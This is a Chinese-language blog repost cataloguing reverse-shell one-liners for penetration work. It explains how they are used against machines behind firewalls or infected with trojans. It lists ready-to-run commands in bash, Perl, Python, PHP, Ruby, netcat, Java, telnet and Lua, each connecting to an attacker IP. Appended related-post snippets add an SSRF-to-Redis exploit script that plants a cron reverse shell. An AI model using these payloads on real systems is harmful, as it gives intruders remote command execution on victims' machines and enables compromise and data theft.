渗透-N种反弹shell方法

最新推荐文章于 2024-10-05 23:31:08 发布
转载 最新推荐文章于 2024-10-05 23:31:08 发布 · 225 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/-qing-/p/10841677.html
文章标签:

#shell #ruby #运维

本文深入解析反弹Shell技术,包括其工作原理、应用场景及多种实现方式,如bash、Perl、Python等,适用于网络受限环境下的远程控制。

简介

       reverse shell反弹shell或者说反向shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

什么是反弹,为什么要反弹

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。

什么时候需要

l   某客户机中了你的网马,但是它在局域网内,你直接连接不了。它的ip会动态改变,你不能持续控制。

l   由于防火墙等限制,对方机器只能发送请求,不能接收请求。

l   对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。

有哪些姿势

bash:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl 1:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl 2 不依赖/bin/sh:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"123.123.123.123:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Perl 3 Windows:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"123.123.123.123:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP:

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby:

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Ruby Windows:

ruby -rsocket -e 'c=TCPSocket.new("123.123.123.123","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Ruby 不依赖 /bin/sh:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("123.123.123.123","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NC:

nc -e /bin/sh 10.0.0.1 1234

有些版本的NC可能不支持-e选项

不能使用-e时

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java:

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()

Telnet:

NC不可用或者/dev/tcp不可用时

mknod backpipe p && telnet 123.123.123.123 8080 0<backpipe | /bin/bash 1>backpipe

Lua:

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

如何连接:

先在本地机器上执行:

nc –l –p 端口

然后在远程机器上执行上述反弹shell的代码即可,对方系统上安装什么了就用什么,没安装咱就上传一个。

 

补充一下:

关于 linux中的一个特殊文件: /dev/tcp   

有一个特殊的文件/dev/tcp,打开这个文件就类似于发出了一个socket调用建立一个socket连接读写这个文件就相当于在这个socket连接中传输数据。

 

转载于:https://www.cnblogs.com/-qing-/p/10841677.html

反弹shell方法
Cwillchris的博客
05-04 718
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 1007
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 8900
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹shell汇总(超详细)
热门推荐
人无名,便可潜心练剑。
05-27 1万+
反弹shell姿势大全,看这一篇就够啦~
反弹shell在线命令生成平台
Lucker_YYY的博客
08-31 903
分享几个在线命令生成平台。
Weblogic反序列化漏洞(CVE-2018-2628)实现反弹shell
Becktick的博客
04-25 2154
Weblogic反序列化漏洞(CVE-2018-2628)反弹shell 技术无罪,请勿用于恶意用途 转载请注明出处! 看见大部分复现教程都是弹计算器,创建文件夹,对于一些人来说不能满足需求,所以我准备做一个反弹shell的复现。 测试机:MacBook-Air 测试机IP:192.168.0.100 靶机IP:192.168.0.100:7001 环境: docker 工具:CVE-2018-2...
pWnos1.0 靶机渗透 (Perl CGI 的反弹 shell 利用)
m0_63416413的博客
10-05 1896
主机发现,机器开放 22, 80, 10000 端口80 端口发现 文件包含,可读到 /etc/passwd,但是没有读到 /etc/shadow漏洞脚本扫描结合浏览器访问观察,发现 10000 端口运行 webmin,搜索漏洞脚本利用使用 perl 脚本读取 /etc/passwd 和 /etc/shadow 内容,使用 john 破解 shadow,拿到 vmware 用户的明文密码使用 ssh 登录,期间配置 ssh 参数。获得初级 shell,观察无 sudo 权限,尝试提权。
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1203
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
Linux反弹Shell的多种技巧
安心写bug的博客
08-10 1348
反弹Shell(Reverse Shell)主要用来实现反向连接,突破防火墙限制、权限不足、端口限制、动态IP、内网NAT等情况,这些限制使得传统的正向连接(如SSH、Telnet等)难以实现。
FazScan:| FazScan是一个Perl程序,用于进行一些漏洞扫描和渗透测试|
02-05
FazScan FazScan是一个Perl程序,用于进行漏洞扫描和渗透测试。 该程序有18个最终选择。 FazScan,漏洞扫描和渗透测试程序 可用选项: 1. SQL注入学期 2.通用SQLi漏洞扫描程序 3.高级SQLi漏洞扫描程序 4.通用Web漏洞扫描程序 5.自动化CMS检测器 6. Web CMS WordPress漏洞扫描程序 7. Web CMS Magento漏洞扫描程序 8. Web CMS Joomla漏洞扫描程序 9. Web CMS Lokomedia漏洞扫描程序 10. Web CMS Drupal漏洞扫描程序+ Shell上传程序 11. Web信息收集工具包
渗透测试-反弹Pikachu平台服务器shell
m0_63917373的博客
07-30 2101
反弹shell pikachu漏洞测试 Windows的cmd权限的反弹 netcat工具的使用
shell rm -r 除免问答_反弹shell集锦
weixin_36076701的博客
01-31 372
1. 关于反弹shell 就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。2. 反弹shell的原因 通常用于被控端因防火墙受限、权限不足、端口被占用等情形 假设我们攻击了一台机器,打开了该...
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
08-28 4008
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。
VM虚拟机端口映射接收CS弹反木马
剁椒鱼头没剁椒的博客
07-04 1946
在日常的对客户的内网进行渗透的时候,通常会使用公网服务器来搭建CS来反弹shell,但是有时候会出现,客户不让你使用公网服务器来进行反弹shell,只允许本地来进行反弹shell,那么就会出现这样的一个,如果你能够直接连接网线来配置固定IP,那么更好,这个就不需要看了,没什么意义了,那么还有一种极端的情况是什么,只让你连接WIFI,或者条件不允许你去使用网线直连,那么有什么好的解决办法?
反弹shell检测的一些思路
2401_84466361的博客
06-04 1092
反弹shell攻击者常用的手段之一,通过反弹Shell攻击者可以绕过防火墙,获取目标系统的shell访问权限,进行后续的恶意操作。因此,及时检测并阻止反弹Shell行为对于安全防护来说非常重要。本文通过介绍反弹shell的常用手段,探讨检测的思路以及简单的代码实现。
java反弹shell
a807719447的专栏
01-26 2225
import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="xx.xx.xx.xx"; int port=9001; String cmd="/bi.
DC-3 渗透实战---sql注入、反弹shell、Ubuntu16.04double-fdput()提权
z2560088的博客
09-26 851
扫描靶机Ip根据靶机Mac确定靶机ip地址为 nmap -sP 192.168.160.0/24 或 netdiscover -r 192.168.160.0/24 确定ip地址为192.168.160.141 nmap 192.168.160.141 -sV -p- -A 发现80端口,和开源内容管理系统 joomla 连接http://192.168.160.141 joomscan --url http://192.168.160.141 发现joomla...
反弹shell后如何传输文件
fjh1997的博客
01-06 848
之后使用zmodern协议。
ssrf 反弹shell
最新发布
01-06
### SSRF 漏洞利用反弹 Shell 的技术细节 #### 一、SSRF漏洞概述 SSRF (Server-Side Request Forgery, 服务器端请求伪造)是一种安全漏洞,允许攻击者构造恶意请求,使应用程序向指定的URL发送HTTP请求。这种攻击通常用于访问内部网络资源或绕过防火墙限制[^4]。 #### 二、利用过程详解 当存在SSRF漏洞的应用程序能够与内网中的Redis服务通信时,可以通过以下方式实现反弹Shell: 1. **获取未授权访问权限** 如果目标环境内的Redis实例配置不当,默认情况下监听所有接口且无需密码验证,则可以直接连接并执行命令[^3]。 2. **设置持久化后门** 攻击者可利用`CONFIG SET dir /var/spool/cron/`指令改变默认保存路径至cron任务文件夹;再通过`CONFIG SET dbfilename root`创建名为root的新数据库文件,在其中植入恶意代码片段[^2]。 3. **触发反弹Shell行为** 将精心设计过的bash脚本作为定时作业写入上述位置,确保其每隔一段时间尝试建立反向外联通道指向攻击者的机器。例如: ```bash * * * * * bash -i >& /dev/tcp/yourip/6666 0>&1 ``` 4. **维持会话控制** 成功建立TCP连接之后便可以在受害主机上获得交互式的shell终端,进一步实施更多类型的渗透测试活动[^1]。 ```python import requests def exploit_ssrf(redis_ip, attacker_ip, port=6666): payload = f"*1\r\n$8\r\nFLUSHALL\r\n*3\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$3\ndir\r\n$5\r\n/var/\r\nspool/cron/\r\n*3\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$9\r\ndbfilename\r\n$4\r\nroot\r\n*2\r\n$4\r\nAUTH\r\n$7\r\npassword\r\n*2\r\n$4\r\nEVAL\r\n\"os.execute('echo \"* * * * * bash -i >& /dev/tcp/{attacker_ip}/{port} 0>&1\">>/var/spool/cron/root')\"\r\n" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = {'data':payload} try: response = requests.post(f"http://{redis_ip}:6379",headers=headers,data=data) print(response.status_code) except Exception as e: print(e) exploit_ssrf("internal.redis.server","external.attacker.ip") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值